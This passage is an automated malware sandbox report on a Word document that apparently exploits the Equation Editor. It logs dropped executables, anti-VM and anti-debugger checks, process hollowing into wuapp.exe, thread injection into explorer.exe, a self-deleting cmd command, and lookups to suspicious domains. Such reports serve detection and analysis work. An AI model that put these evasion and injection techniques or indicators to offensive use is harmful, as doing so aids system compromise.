          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wuapp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3044Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\SysWOW64\wuapp.exe TID: 2212Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeAPI coverage: 7.9 %
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.1025894713.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: word.exe, 00000004.00000002.945543583.0000000000564000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.935522782.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.1026232834.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wuapp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F03F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F06F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wuapp.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B1D57 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B1D57 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exeNetwork Connect: 98.137.244.37 80
          Source: C:\Windows\explorer.exeDomain query: www.storyofsol.com
          Source: C:\Windows\explorer.exeDomain query: www.createacarepack.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\wuapp.exeThread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
